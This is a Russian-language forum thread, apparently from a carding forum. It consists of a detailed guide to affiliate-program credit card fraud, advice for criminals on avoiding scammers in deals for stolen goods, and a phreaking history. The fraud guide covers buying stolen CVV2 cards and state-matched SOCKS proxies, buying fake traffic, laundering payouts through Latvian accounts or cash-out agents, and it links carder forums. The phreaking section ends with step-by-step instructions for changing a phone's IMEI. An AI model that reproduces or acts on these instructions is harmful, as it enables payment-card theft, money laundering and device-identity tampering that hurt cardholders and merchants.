    Далее нас будут интересовать способы оплаты, которыми клиенты могут заплатить за их услуги. Естественно, нам нужен способ оплаты по кредитной карте. Теперь надо обратить особое внимание на то, что именно предлагает будущий партнер. Товар должен быть виртуальным. Книги, футболки, а тем более ноутбуки не подходят. На мой взгляд, лучше всего рекламировать хостинг и темплейты. Ну а самый сладкий кусочек — услуга dedicated servers (аренда сервера). Стоит это удовольствие недешево, поэтому и проценты кардер получит немаленькие.

    Теперь следует проверить, насколько легко скардить данный товар или услугу. Попробуй сначала сам, и если все пройдет нормально, то эта компания нам подходит. Да, пока не забыл – обрати внимание на то, как часто можно получать свои деньги. Я думаю, не стоит работать с компанией, которая выплачивает проценты раз в полгода. К счастью, таких маньяков почти нет.

    Кроме того, есть такое понятие, как «первоначальный холд» — это время, в течение которого твои первые деньги замораживаются. Мне кажется, что оптимальным выбором будет компания, выплачивающая деньги раз в неделю и имеющая первоначальный холд 2 недели. Но это большая редкость, обычно выплаты производят раз в месяц.

    Итак, подведем краткие итоги. Партнер должен:

    Находиться за пределами бывшего СССР.

    Принимать к оплате кредитные карты.

    Выплачивать проценты по WebMoney, E-Gold или wire transfer (банковский перевод).

    Легко кардиться.

    Продавать виртуальный товар.

    Производить выплаты не реже раза в месяц.

    Делаем сайт а-ля «Рога и Копыта»


    Ну что ж, партнера ты нашел, теперь нужен сайт, который будет его рекламировать. Для начала следует определиться с хостингом и доменным именем. Хостинг и домен точно не должны быть нашими. Западные компании как огня боятся людей из СНГ, думая, что все мы — мошенники.
    Все это добро можно, разумеется, скардить, но хостинг лучше купить. Обойдется он не очень дорого, бери самый дешевый тарифный план, т.к. базы данных и всякие примочки, типа ssh доступа, тебе вряд ли понадобятся. Домен можно и скардить, но и купить тоже можно, поскольку стоит он недорого. Будет очень обидно, если после месяца работы у тебя все это отберут, и ты не успеешь даже окупить потраченные деньги. Домен лучше зарегистрировать в зоне .com, .net, .org.
    Теперь придется поработать веб-мастером. Твой сайт должен иметь идею. Это не должна быть страничка Васи Пупкина. Можно, например, сделать развлекательный сайт, онлайн-журнал обзора новинок железа-софта или то, что тебе ближе всего. Учти, что почти все западные компании откажутся с тобой работать, если на твоем сайте будет порнография, призывы к расизму, пропаганда оружия или наркотиков. Тема должна быть привычная, не вызывающая подозрений и лишних вопросов.

    Дизайн сайта должен быть добротным. Совсем не стоит делать летающие звезды или прыгающих зайцев, то есть — всего того, что в народе называют попсой. Выбери спокойные цвета, привычный дизайн. Твой партнер обязательно захочет взглянуть на проект, и он никоим образом не должен вызывать подозрений. Можно пойти и более хитрым путем, например, сделать сайт на китайском языке, чтобы партнеры ничего не поняли. Делается это легко: достаточно зайти на любой китайский сайт, скопировать оттуда много иероглифов, и, поменяв их местами, вставить в свой сайт. Это очень удобное решение, поскольку вопросов будет меньше, да и партнер будет рад — ведь китайцев целый миллиард, и это очень большой рынок будущей клиентуры.

    После того как проект будет готов, можно идти на сайт партнера и регистрироваться. Если все пройдет нормально и у него не появятся лишние вопросы, в скором времени ты получишь письмо с поздравлениями и дальнейшими инструкциями. Вешай на свой сайт баннеры и приступай к дальнейшей работе.

    Подведем краткие итоги. Наш сайт должен иметь:

    Хостинг и домен, которые не указывают на принадлежность к СНГ.

    Смысл и идею, которая не вызовет подозрений у партнера.

    Добротный дизайн, контент и структуру.

    Особенности вбива


    Теперь, когда у тебя есть сайт, который рекламирует партнера, самое время для торжественной части. Тут много тонкостей. Про все рассказать не удастся, т.к. у каждого партнера свои заморочки. Но основные принципы обсудить стоит. Прежде всего, тебе понадобятся сами карты, которые ты будешь вбивать (расплачиваться за услуги спонсора). Если у тебя уже есть своя база или ты можешь взламывать интернет-магазины, то одна из статей расходов исчезает. Ну а если нет, то это совсем не проблема. Я думаю, не стоит объяснять, что сгенерированные карты уже давно никто не принимает. Карты (далее — сс) всегда можно купить в интернете у людей, которые занимаются их добычей и продажей. Найти продавца сс можно на кардерских сайтах и форумах. При выборе продавца обязательно узнай, насколько он надежен. Обычно на форумах можно посмотреть дату его регистрации и отзывы других покупателей. Тебе понадобятся карты с CVV2 кодом. Скорее всего, ты будешь использовать сс из Америки. Средняя цена в интернете — $2 за одну сс.
    Бери сразу не одну-две сс, а штук 50-100. В этом случае ты можешь получить скидку от продавца. Лучше всего покупать дебитные сс, поскольку чарджбэк по ним идет дольше, месяца 3-4.
    Однако карты — это еще не все. Стоит позаботиться и о своей безопасности. Для этого тебе понадобятся прокси-серверы. Не стоит надеяться на прокси, взятые из публичных источников, т.к. большинство процессингов также имеют эти списки и строго следят за тем, чтобы клиент, производящий оплату, не зашел под ними. Нам понадобятся SOCKS прокси. Желательно, чтобы прокси, которыми ты будешь пользоваться, были того же штата, что и твоя сс. Поэтому приобретать их тебе придется у людей, которые специально предоставляют подобные сервисы. Найти их можно также на кардерских форумах. В среднем, доступ к базе анонимных прокси будет стоить в месяц $60.
    Но и это еще не все. Что подумает партнер, когда обнаружит, что из трех пользователей в день, заходящих к тебе на сайт, все тут же кликают на баннер и покупают его услуги? Ситуация очень странная. Могу сказать сразу, что письма партнеру с лестными отзывами о баннерах, имеющих КПД 100%, вряд ли его убедят. Значит — наш сайт должен иметь хорошую посещаемость, или хотя бы делать вид, что он ее имеет. В среднем КПД баннера – 0,1%, так что не будем отступать от этого правила — на каждый вбив создавай трафик около 1000 пользователей. Сделать это можно по-разному. Можно самому написать скрипт, можно найти бесплатные скрипты в интернете или купить. Но самый простой вариант — это купить трафик. Стоимость разная, в среднем — $1 за 1000 посещений. Люди, которые этим занимаются, называются трафагонами, и их всегда можно найти на тех же кардерских форумах.

    Если все вышеперечисленное у тебя есть, можешь начинать работать. Сколько карт в день вбивать — зависит от твоей наглости. Если ты будешь вбивать по 1-2 сс в день, это будет вполне нормальный вариант.

    Итак, для успешного вбива необходимо:

    Иметь карты.

    Иметь прокси того же штата, что и карта.

    Нагнать трафик на свой сайт.

    Забираем кеш или тонкости обнала


    Допустим, все прошло успешно, и ты работаешь уже месяц. Естественно, пора подумать о том, как забрать свои деньги, пока не пошли чарджбэки. Если твой партнер высылает деньги на WebMoney или E-Gold, то все очень просто – достаточно зарегистрировать аккаунт в нужной системе и перечислять туда деньги. Как обналичить Webmoney, я думаю, все знают, об этом подробно написано на их сайте. В случае с E-Gold пугаться тоже не стоит. В интернете много контор, занимающихся обменом – о них ты прочитаешь в статье «8 хитрых способов обнала денег с кред».
    Сложнее, если тебе будут перечислять сумму посредством банковского перевода. Хотя вся сложность состоит в том, что придется найти нальщика. Как всегда, найти его можно на кардерских форумах. Нальщик возьмет с тебя процент (какой именно — ты договоришься с ним). Также придется договориться и о том, как тебе удобнее будет получить деньги. Надо сказать, что обналичивание денег — один из самых главных моментов. Прежде чем обращаться к нальщику, стоит посмотреть его рекомендации. Если нальщик хороший, то люди, работавшие с ним, обязательно оставят о нем отзывы. Тут может возникнуть проблема: обычно нальщику, особенно если он профи, не очень выгодно работать с суммами меньше $1000. Поэтому меньшую сумму он может и не принять. В этом случае можно действовать по-разному: можно все же уговорить его принять $500, а можно просто подкопить еще денег на счету.

    Кстати, с нальщиком лучше договориться заранее, еще до подключения к партнерской программе. Дело в том, что счет, на который будут идти твои деньги, возможно, придется указывать во время регистрации. Лучше, если все будет готово заранее. Это избавит от непредвиденных сюрпризов.
    Для обналичивания подойдет обычный счет где-нибудь в Латвии. При особом желании и наличии лишних денег счет можно открыть самому, а можно купить уже готовый. Большинство прибалтийских банков могут открыть счет без личного визита к ним. Для этого тебе понадобятся ксерокопии некоторых документов (каких именно — зависит от банка). После чего их надо послать по почте или по факсу. Если все пройдет удачно, то ты получишь конверт, в котором будет дебетная карта (Visa Electron или Cirrus/Maestro) с пин-кодом, а также инструкции для онлайнового управления счетом. Такой счет будет очень полезен и в дальнейшем. Он обязательно окупится, если, конечно, не запороть его после первого же перевода. Кроме того, теперь уже не придется отдавать проценты нальщику, и появится возможность обналичивать суммы меньше $1000.
    В правилах партнера необходимо внимательно прочитать, в какие страны он может делать переводы. Если этого нет в правилах, придется написать письмо в службу поддержки и спросить об этом. Может оказаться, что они переводят деньги только в пределах США или другой страны.

    В общем, для обналичивания денег нужно:

    Иметь счет для обнала (свой или предоставленный нальщиком).

    Иметь необходимую сумму на счету у партнера.

    Превысить первоначальный холд (если он есть).

    Одним выстрелом двух зайцев


    Если все было сделано правильно, то уже через месяц-полтора в твоем кармане осядет некоторая сумма денег. Как долго будет работать проект — зависит только от тебя и от жадности кардхолдеров. За месяц проект может легко окупиться, плюс принести некоторую прибыль. Дальше все деньги будут идти уже тебе в карман. Но, как всегда, денег хочется больше. И это, в принципе, не проблема.
    Допустим, ты рекламируешь хостинг своего партнера. А зачем выбрасывать на помойку честно накарженный товар? Куда более разумным решением будет продать этот хостинг, например, в два раза дешевле. Попробуй найти людей, которым он будет нужен. Если продавать его на кардерских форумах, то лучше сразу предупредить покупателя, что товар скаржен, чтобы избежать дальнейших разборок. Лучше будут продаваться темплейты, т.к. они уже есть и их не закроют, как, например, хостинг. Самое выгодное — это, как я говорил, dedicated servers. Их можно использовать и в своих целях.

    И в заключение…

    Я постарался показать, что кардинг — это все же творческий процесс. Главное верить в свои силы, и тогда все должно получиться. Сначала все кажется очень сложным, но если потратить немного времени, то картина быстро проясняется. Конечно, на пути тебя будут подстерегать неожиданности, но рассказать обо всех невозможно. Связанно это с тем, что многое меняется очень быстро, да и в каждой компании свои правила и порядки. Думаю, многие меня осудят, сказав, что кардинг — это противозаконно и аморально. Совершенно с этим согласен, поэтому никого не призываю заниматься чем-то подобным.

    Список сайтов, на которых можно найти много полезного для начинающего кардера:
    http://forum.carderplanet.net/
    http://thecc.ru/
    www.lncrew.com/lnforum/
    www.carderclan.net/

    Но не кидайся на первый попавшийся сайт, сначала пройдись по разным компаниям и изучи их условия.
    Ну а самый сладкий кусочек — услуга dedicated servers (аренда сервера). Стоит это удовольствие недешево, поэтому и проценты будут немаленькие.
    Дизайн сайта должен быть добротным. Совсем не стоит делать летающие звезды или прыгающих зайцев, то есть всего того, что в народе называют попсой.
    Тебе понадобятся SOCKS прокси. Желательно, чтобы прокси, которыми ты будешь пользоваться, были того же штата, что и твоя сс.
    Лучше всего покупать дебитные сс, поскольку чарджбэк по ним идет дольше, месяца 3-4.
    Для обналичивания подойдет обычный счет где-нибудь в Латвии. При особом желании и наличии лишних денег счет можно открыть самому, а можно купить уже готовый.
    Основу проблемы <кидков> создают доверчивые люди которых обманывают, ведь в 90% случаев обмана человек переводит деньги или оказывает услуги <вперёд> , основная масса кинутых в кардинге и в других сферах — новички , которые либо не до конца разбираются в том чем занимаются, что даёт кидале дополнительный шанс обмануть жертву, сыпя терминами, либо слишком доверчивы, так что если вас обманули в большинстве случаев можете записывать себя в ряды новичков или доверчивых. Ещё запомните фразу <скупой платит дважды> в контексте кидал она как никогда актуальна.

    Как становятся кидалами или с чего начинается обман:

    В своём большинстве кидалами становятся те кто не смог достичь каких-либо успехов в том чем занимается он и его окружение.
    В итоге человек разочаровавшись видит что другие зарабатывают что-то а он ничего не получает. Сразу на ум приходит мысль — <а почему бы не взять у своих> . Чаще всего кидалы получаются из тех кто купил енролл, попробовал заняться вещевухой, у него ничего не вышло но енролл ещё не сдох и он берёт на каком-то форуме постит <продаю енролл mbna>, к нему стучится пару человек и он ВСЕМ им продаёт этот енролл. Вроде обмана как такового нет — все получили то что хотели (фактор продажи товара в несколько рук мы не рассматриваем) однако с очень большой вероятностью никто из купивших рол ничего не добьется и примкнёт к стае <обиженных и угнетённых>, это первая стадия.

    Дальше он вспомнив ход сделок , опять запостит <продаю енролл сити> (так как он дороже) к нему постучит 10 человек из которых 7 нормальных а 3 новичка , 7 не захотят с ним работать так как он не даст логин и пароль вперёд (у него их нет) а трое возьмут да и купят, переведя wmz. Вывод — кидала почувствует деньги и навсегда останется мошенником , даже в дальнейших возможно честных сделках первая мысль у него будет <а как же мне обмануть>.
     
  7. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Признаки обмана и кидалы:

    Кидала хочет получить деньги быстрее и ему все равно на исход сделки так как при <удачном> раскладе он все равно останется в плюсе , так что первая характерная черта кидал — спешка, они придумывают кучу побочных факторов провоцирующих ускорение сделки: беременная жена , блокировка кошелька , беспокойство дропа итак далее, таких <подмазок> можно придумать кучу.
    кидала хочет показать себя шарящим человеком поэтому постоянно употребляет не в меру большое количество терминов / спецефических слов.

    Как крутой кардер кидала <живёт в юса> и он <бомж у которого нет денег на русскую клавиатуру>, посему он пишет транслитом, но иногда (при длительном общении) проскакивают фразы на русском. Стандартным ответом если его напрячь по данному вопросу (теоретически) будет <я общаюсь с нерускоговорящими партнёрами> , однако сам он ни на английском ни на китайском ни 1 слова не знает (это легко проверить стукнув ему с другой аси).
    Кидала пишет по исключительно на английском — первый напрашивающийся вывод — <он иностранец и на русском не муму> такой вывод обычно сразу повышает уровень доверия. Так же факт незнания языка, грамматические ошибки и постоянных смайлы или знаки вырывающихся эмоций. По типу «ой как чешутся руки, и ещё чуть-чуть и я его обману и кину». В большинстве случаев это либо реальные олени/домохозяйки которые на русском не говорят либо как чаще и бывает наши соотечественники — кидалы. Проверить это довольно просто, как и в вышеописанном пункте стукнуть с другой аси , основные варианты стука: предложить ему то от чего он не сможет отказаться, постучать от имени <Маши> у которой заполнена вся инфа в асе и которая хочет познакомиться, чаще всего кидала клюнет.

    Ник кидалы.

    Жадность и несдержанность частенько проявляются в никах которые меняются как перчатки, но как только видим Экспресс, Фаст, Изи и так далее, да еще в придачу с словом бабло, кэш, капуста уже стоит быть осторожным и собственно говоря начинать проверять человека.
    номер icq кидалы. Сейчас шестизначные номера аси не является признаком <крутости>, поэтому судить по номеру нельзя. Аналогично с датой регистрации на форуме — пример тому <лука> с cw по этому признаку тоже судить нельзя.

    Количество постов кидалы — у потенциального кидалы либо слишком маленькое относительно даты регистрации, либо наоборот сильно большое (набивает посты). Перед сделкой с ним, рекомендуется почитать что человек пишет на форумах, и оценить его адекватность , если это тупой набой постов то вывод делайте сами.

    Неадекватное поведение/разговор — говорит много не по делу , говорит много о другом деле , хочет сразу с тобой заняться многим , корешится. Так же кидалы очень любят орать что-то типа «да ты кидала?! решил меня кинуть?» как говориться меряют людей по-себе.
    Фразы в духе <я на форумах особо не тусуюсь , работаю на заказ итд> такое бывает но редко. Желание работать сразу на большие суммы без предварительной проверки и спешка мол закроется ВЮ офис или отмазки что «тестовыми заливами спалишь дропа» тоже в принципе свидетельствует о том что надо быть осторожным.

    Очень много кидал начали делать посты и в конце приписывать, работаю только через гаранта, но когда заходит разговор о сделке появляется куча отмазок и отговорок иногда даже звонки с целью запудрить мозг.

    Вывод:

    Ни 1 из перечисленных выше факторов не может говорить о том что чел кидала но в совокупности они дают знать что с ним лучше не иметь дел, общая тактика кидалы — запудрить жертве мозг.


    Как проводить сделки:

    С непроверенными людьми исключительно через гаранта не пожалейте 10-20$ даже если товар столько и стоит. Если вас кинут — у вас останется негативное впечатление и деньги попадут мошеннику в руки, что как было описано выше скорее всего подвигнет его к новым обманам, а если вы заплатите гаранту и проведёте сделку успешно то у вас будет <проверенный> (не факт что он не кинет вас в последствии на более крупную сумму) селлер и гарант получит свои честно заработанные деньги которые в большинстве случаев пойдут на развитие форумов — все будут рады.
    В случае работы без гаранта, работайте только с известными людьми либо только при наличии положительных отзывов (от проверенных участников , чтоб избежать факта самоотписа отзывов). как правило новичкам в этой ситуации приходиться тяжело, особо ничего нет показать, материалы достали и хочется продать, в общем такой замкнутый круг и к сожалению очень много способных начинающих ребят оказывается или обмануты или с ними просто ни кто не хочет работать, в принципе чтобы избежать подобной судьбы советуем начинать потихоньку и без особых понтов.

    Если не уверены в человеке — не стоит мучить его, навязывая ему свои хитрые условия сделки, ищите другого. Так как этим вы у нормального человека сложите о себе мнение тормоза, а кидале не дадите вас кинуть тем самым потратив своё и чужое время.

    Да в принципе вариантов тут остается маловато.
    Или делайте сделки через гарантов или с проверенными людьми, варианты мол дам своего гаранта тоже очень часто могут оказаться обманом.
    Вариант 50 сейчас 50 потом работает более-менее гладко, хотя если человек не кидала то дать все 100 вперёд не проблема.
    Для уточнения кем является человек , особенно стучащий вам , обязательно просите его отправить вам PM на форуме.
    Сегодня, да, в общем-то, как и всегда, все хотят халявы. Это слово прижилось в сознании русского народа. Каждый хочет бесплатного проезда в метро, бесплатной автостоянки возле магазина рядом с домом, бесплатного туалета, даже бесплатных пакетов в супермаркете. Сотовая связь не исключение. Только сейчас на рынке мобильной связи эта проблема теряет актуальность, а в начале девяностых она была весьма насущной. В наши дни никто не будет тратить на сотовую связь 20-30 баксов в день — легче купить безлимитный тариф, а лет десять назад такой тариф в год обходился в стоимость нового автомобиля бизнес-класса.

    А народ хотел дешевле…

    Народ хотел дешевле, а операторы не снижали цены в силу многих причин — за что и расплачивались в буквальном смысле. Именно в то время начали появляться так называемые фрикеры — телефонные пираты. Многие думают, что если сосед дядя Вася с седьмого этажа поменял прошивку на своем сотовом телефоне, то он автоматически стал фрикером. Нет. Настоящие фрикеры были специалистами своего дела – в то время их было очень мало, а сейчас практически нет. Это выпускники МИФИ, МВТУ имени Баумана и других сильных вузов, где программирование, высшая математика и радиоэлектроника стоят не на последних местах в списке изучаемых дисциплин. Они делали связь бесплатной, чем привлекали внимание общественности и соответствующих силовых структур. Именно тогда было создано небезызвестное Управление «Р», занимающееся преступлениями в сфере высоких технологий. Сейчас такие фрикеры не востребованы, потому что их работа не окупается, а в начале девяностых они легко зарабатывали в день сумму с четырьмя нулями и далеко не российских рублей. Именно те девяностые ознаменовались спадом российской экономики, тогда деньги валялись на земле – их нужно было только поднять, и фрикеры поднимали.

    Отпустите меня в Гималаи

    Все начиналось с пресловутых телефонов «Алтай», с которых звонили родственникам в Америку. Причем бесплатно и много, за счет людей, к которым нелегально подключались. Потом все перешло на сотовые. С ними, однако, все сложнее – ведь в мобильном телефоне есть SIM-карта, которую определяет базовая станция и регистрирует в сети по ее номеру – а не по номеру сотового. Безусловно, я имею в виду стандарт GSM. Этот номер и вся другая важная информация (PIN, PUK и пр.) закодирована на SIM-карте 128-битовым ключом. Самая большая проблема была в том, чтобы подобрать этот ужасно-много-битовый ключ. Сделать это в домашних условиях можно только банальным перебором. И именно этим занимались настоящие фрикеры. Но об этом чуть позже, а пока я расскажу тебе необходимый минимум теории.

    Вообще, вся зона охвата территории оператором делится на относительно маленькие соты (их диаметр — в среднем 5 километров). В городе, как правило, это расстояние – метров 600, за городом – около четырех километров. Как только абонент переходит с включенным телефоном из одной соты в другую, его регистрирует базовая станция той соты, на которой он в данный момент находится. Расстояние до ближайшей базовой станции определяется элементарно. Во многих аппаратах эта уникальная опция скрыта, ее просто нужно найти. Мобильный телефон определяется по-другому: у каждого аппарата есть пятнадцатизначный серийный номер – IMEI. Первые четырнадцать цифр этого номера фиксировано устанавливаются при прошивке, пятнадцатая генерируется псевдослучайно. У всех телефонов IMEI изначально разный; к определению и регистрации в сети он никакого отношения не имеет. Он нужен для того, чтобы узнать владельца аппарата, если это необходимо. Но это намного более трудоемкое и неблагодарное занятие, чем определение местоположения активной в данный момент SIM-карты. Серийный номер мобильного телефона говорит о многом. По нему можно узнать номер партии, к которой принадлежит данный телефон. А по номеру партии — «серый» этот сотовый или нет.

    SIMEdit и RS-232

    Много ходило и ходит легенд о перепрошивке SIM-карты. Некоторые из этих легенд никакого отношения к самой перепрошивке не имеют. Перепрошивка, или клонирование, SIM-карты, на самом деле нетрудоемкий процесс, но он требует больших материальных затрат, прямых рук, светлой головы и большого количества свободного времени. Очень часто я слышал рассказы о том, что люди создавали образ симки, имея в руках только комплекты PIN и PUK-кодов от этой самой SIM-карты, а потом с помощью кабеля RS-232 запросто перепрошивали ее в самом телефоне. Это бред. На данный момент я не знаю человека, который смог бы перепрошить SIM-карту удаленно, и, наверное, не узнаю никогда.

    Также упоминалась программа SIMEdit, которая может «абсолютно» все, на поверку оказавшаяся обычным редактором телефонной книги, деревянным и не бесплатным. Узнать тот самый 128-битовый ключ SIM-карты можно только с помощью мощнейшего криптоанализатора (стоимость которого заоблачна для среднестатистического пользователя), и не меньше чем за 10 часов. Есть еще одно «но»: за эти десять, а может, и больше часов идет сильнейшая нагрузка на SIM, и некоторые экземпляры карточек этого не выдерживают и сгорают.

    Жаркая весна сорок пятого

    Иными словами, при себе, минимум на полдня, нужно иметь SIM-карту товарища, которая обязана выжить, потому что ей еще предстоит работать. Но фрикеров такие нюансы не останавливали, а даже наоборот – вдохновляли. Они находили симки, делали их образы и выкидывали сотни сгоревших. Телефонных хакеров не останавливало даже то, что с перепрошитой карты можно только делать звонки, а не принимать их. В то время минута, по теперешним меркам, стоила очень дорого, и этот бизнес того стоил.
    В мае 2002 года в российских СМИ появилось заявление о том, что специалисты из компании IBM смогли взломать код SIM-карты с помощью только общедоступных электронных приборов за несколько минут. Т.е. любой дядя Вася, о котором я упоминал ранее, может с помощью одного паяльника за пять минут взламывать симки. Естественно, такой расклад не понравился никому. Сразу же после этого феноменального открытия (не факт, кстати, что оно было открытием – у нас тоже не дураки сидели), по технологии, предложенной IBM, к кодовой матрице была добавлена вспомогательная, беспорядочно сгенерированная, которая усиливала защиту SIM-карты на порядок и прикрывала обнаруженную дырку. К этому времени фрикерство постепенно изжило себя.
    С телефонами же стандарта DAMPS, AMPS и пр. дела обстояли намного проще. Информация о сим-карте хранится у них в энергонезависимой памяти телефона – eeprom’е. Чтобы сделать «двойник» такого телефона, нужно всего лишь изменить IMEI, который, кстати, никак не зашифрован.

    No pain, no game

    Хакеров ловили и сажали. Их было немного, и поймать их было нетрудно. Им подсылали подставных лиц под видом покупателей, а потом брали с поличным. Намного больше было людей, которые пользовались левыми SIM-картами, и посадить их было сложнее. Им нечего было предъявить. А Управлению «Р» надо было повышать раскрываемость телефонных преступлений, потому что заявлений приходила уйма. Операторы сами пытались бороться с хакерами. Множество людей обращались в центральные офисы с вопросом: «А откуда у меня в распечатках счетов такие огромные суммы и непонятные телефонные номера?» Абоненту вдвойне компенсировали украденную сумму, просили вычеркнуть свои телефоны и начинали работать с оставшимися. По этим номерам пытались выйти на «двойников», но результатов, естественно, эти оперативно-розыскные мероприятия не давали. Так было в самом начале, сейчас же такие проблемы могут возникнуть из-за неточности систем биллинга. Но до сих пор для меня остается загадкой, почему операторам это всегда идет в плюс :).



    Пионер всегда готов, как Гагарин и Титов

    Но шло время, поднимать деньги с пола стало намного сложнее, особенно сидя. Нужно было искать более законные методы. Законные в том смысле, чтобы в Уголовном кодексе не было по этому поводу законов. На рынок связи пришла новая волна фрикеров, которых фрикерами-то не назовешь. Их стало очень много. Они просто умели тупо производить разлочку сотовых телефонов и последующую их русификацию, нажимая клавиши на клавиатуре в определенном порядке. У них не было никакого багажа знаний, о том, как это делать, им рассказали умные люди, которые, в большинстве своем, шлифовали к тому времени нары.

    Чуть раньше разлочить телефон стоило дорого: в розницу порядка 40-50 американских президентов. Аппараты стоили в России намного дороже, чем на Западе. Их оттуда и везли. Здесь телефоны перепрошивали под наши сети. Именно в то время появилось понятие «серый» телефон. Сейчас «серых» практически нет, правда, иногда в Москве можно увидеть крупные партии. Но не тогдашнего масштаба, когда только в офисах операторов продавали сертифицированное оборудование. Тут пришло и много зеленых фрикеров, и цены стали обвально падать: буквально до двух-трех долларов за штуку. Каждый хотел урвать свой кусок, и нерезиновый пирог пришлось поделить на огромное количество человек. Тогда для тех, кто был не в курсе (а их было подавляющее большинство), разлочка телефона стояла на одном уровне сложности с перепрошивкой SIM-карты. Они были практически правы, но этот уровень для них был самым последним. Когда гражданин узнавал, что «тот вон парень в рыжей футболке перепрошивает телефоны», он сразу проникался глубоким уважением к этому человеку.

    Серийные номера

    Используя информацию о мобильниках, которая на данный момент лежит в интернете, можно практически с любым телефоном вытворять что угодно. Можно заблокировать сотовый на сеть, на отдельную SIM-карту, снять с телефона код блокировки, изменить IMEI и много чего другого. Кстати, про IMEI. Однажды с моей знакомой приключилась неприятная история. В институте у нее украли телефон, и она обратилась в офис оператора с вопросом о возможности возврата ей ее сотового. Оператор сказал, что это не вопрос. Он объяснил, что нужно только подать заявление в милицию, и он (оператор) сам по серийному номеру телефона найдет аппарат, ведь каждый номер уникален. Они ей совершенно серьезно сказали, что IMEI изменить невозможно, когда я буквально за несколько часов до этого менял первые одиннадцать цифр серийного номера мобильного на номер своего сотового телефона в международном формате. Именно поэтому в самом начале я сказал, что IMEI разный у всех телефонов только изначально, на этапе их выпуска с конвейера.
    Потом можно найти телефон с таким же серийным номером, как у твоего, причем не один. Возникает предположение, что операторы сотовой связи просто делают вид, что они не в курсе.
    Flash, eeprom и другие страшные слова

    Как я уже говорил, разлочить телефон просто, так же просто, как и достать для этого программное обеспечение. Чтобы заставить сотовый работать в необходимом качестве, нужно изменить его память, т.е. перепрошить ее. Я говорю про flash-память телефона. Только не про тот flash, который ты засовываешь в цифровой фотоаппарат или mp3-плеер, и не про тот, который ты наблюдаешь в интернете. Телефонный flash – это практически то же, что и операционная система компьютера. Это все телефонное меню, игры, калькулятор, диктофон и пр. Эта память — как матрешка, которая продается на Старом Арбате. Самая большая – flash, в нее входит eeprom, который значительно меньше. В eeprom’е записана вся информация по кодам блокировки телефона, настройкам аппарата и другим нужным штуковинам. И самая последняя – память, содержащая IMEI и дату выпуска телефона – она, в свою очередь, является частью eeprom’а. Для русификации телефона производятся изменения во всем flash’е, для разлочки телефона или смены серийного номера – в eeprom’е. Flash в среднем весит 14 мегабайт, eeprom – 53 килобайта, поэтому для разлочки телефона легче из аппарата выкачивать именно eeprom, и с ним уже работать дальше. Единственный нюанс – проверка контрольной суммы. Если во flash’е стереть что-то нужное или добавить лишнее, телефон в лучшем случае откажется работать.

     
  8. Alterego

    Alterego ElusiveVBV ProMarket

    Регистрация:
    3/10/16
    Сообщения:
    27
    Симпатии:
    15
    Репутация:
    25
    Универсальная программа

    Нужно было найти софт, который бы выкачивал flash из телефона, а потом закачивал его обратно. Раньше эти программы были страшным секретом, многие даже не знали, как они называются, некоторые делали их самостоятельно, но от этого суть не менялась. Сейчас я расскажу про программу для работы с телефонами марки Siemens. Ребятам-разработчикам этой программы поставили памятник при жизни. Эта штуковина называется Unisiemens, достать ее можно в любом месте Интернета, и она проста в применении. С ее помощью можно скачать и flash, и eeprom, и даже кусок flash’а с определенного адреса, а потом залить это все обратно.
    Есть два способа разлочить телефон. Самый простой способ: скачать из такого же, но не незалоченного, телефона eeprom и залить его на залоченный. Самый сложный способ: слить eeprom из залоченного телефона – он будет представлять собой обычный бинарник, и разбираться с ним в шестнадцатиричном редакторе. Я в свое время выбрал HexEditor – он до сих пор лежит у меня на почетном месте. Выбор за тобой. Практически так же меняется IMEI телефона, правда для этого существуют немного другие программы, но в интернете их тоже достать несложно, а пользоваться еще легче.

    У меня самый первый разлоченный телефон был мой собственный. Я его заблокировал, а потом перепрошил. Я очень за него боялся – он стоил больше трехсот баксов, а другой я покупать не хотел. Но все прошло нормально. И после этого я уже не боялся ничего :).

    И снится нам не рокот космодрома…

    Но фрикеры занимались не только разлочкой аппаратов и дублированием SIM-карт. В то время существовали возможности прослушивания разговоров по мобильным телефонам. Оборудование стоило порядка пятидесяти-ста тысяч долларов. Главное, чтобы были заказы, правда, за абонентами нужно было бегать в пределах одной соты. Шифровка тогдашнего GSM’а, которой, к слову сказать, почти и не было, на несколько порядков была слабее шифровки GSM’а сегодняшнего. Раньше операторы не задумывались о возможности таких случаев, пока не посадили пару «шпионов». Теперь же сотовая связь практически безопасна: даже операторы сами не могут слушать абонентов. Но бывает, что операторы снимают шифрование с сети. Наверное, все помнят недавний теракт в Тушино во время праздника Крылья. В тот день на территории аэродрома, где проходил праздник, до вечера были отключены все базовые станции. Иными словами, образовался информационный колпак, блокирующий услуги всех московских операторов сотовой связи. Буквально в следующие дни по всей Москве по приказу правительства была отключена шифровка разговоров на всех сотовых телефонах стандарта GSM. Тогда абоненты на три дня смогли почувствовать себя в девяносто третьем.

    А сейчас…


    Сейчас, в силу причин, о которых я рассказал выше, телефонный фрик стал историей. Сегодня совсем другая, на несколько порядков сильнее, защита сотовых сетей и SIM-карт, другое время, другие понятия. Те фрикеры знали, что только на первом этапе появления сотовой связи в России можно зарабатывать большие деньги. Они знали, что такие времена быстро пройдут. И те, кто был хитрее, отхватили больше всех и ни о чем потом не жалели. По крайней мере, на хлеб с икрой им хватало вполне.
    Теперь прошли времена телефонов размером с двухкассетный видеомагнитофон, а цена минуты разговора с пяти американских долларов скатилась до SMS за один американский цент. Уже давно никто не перепрошивает SIM-карты, зато на Митино непонятно откуда берутся номера карточек предоплаты, написанные в столбиках на листах бумаги. Но это уже информационный фрик, который прочно занимает место телефонного.
    Сегодня совсем другая, на несколько порядков сильнее, защита сотовых сетей и SIM-карт, другое время, другие понятия.
    Я думаю, тебе не терпится что-нибудь сделать со своим телефоном, а разбираться с flash’ом вручную неохота. По глазам вижу и понимаю. Наверное, тебе уже хочется поменять несколько чисел серийного номера телефона на год своего рождения. Сегодня я предоставлю тебе эту уникальную возможность. Раз уж мы в статье упоминали про Siemens, то с ним и будем работать. Приготовься стать настоящим фрикером.

    Приготовился? Поехали. Для того чтобы изменить IMEI своего телефона, нужно:

    Включить компьютер.
    Иметь в руках сотовый телефон и кабель RS-232, подключенный к компьютеру.
    Установить с диска, прилагающегося к журналу, программу Siemens Unlock.
    Запустить программу и выбрать модель своего сотового.
    Зайти Сервис > Разблокировать/Сменить IMEI.
    Ввести желаемый IMEI и нажать кнопку сменить.
    Как ты уже заметил, функции программы на этом не ограничиваются. Надеюсь, намек понят :). И напоследок: если тебе это все очень интересно, зайди на ftp://vts.vlad.ru/pub/.. Ты обязательно найдешь там что-нибудь для своего телефона.


    Как обчищают богачей

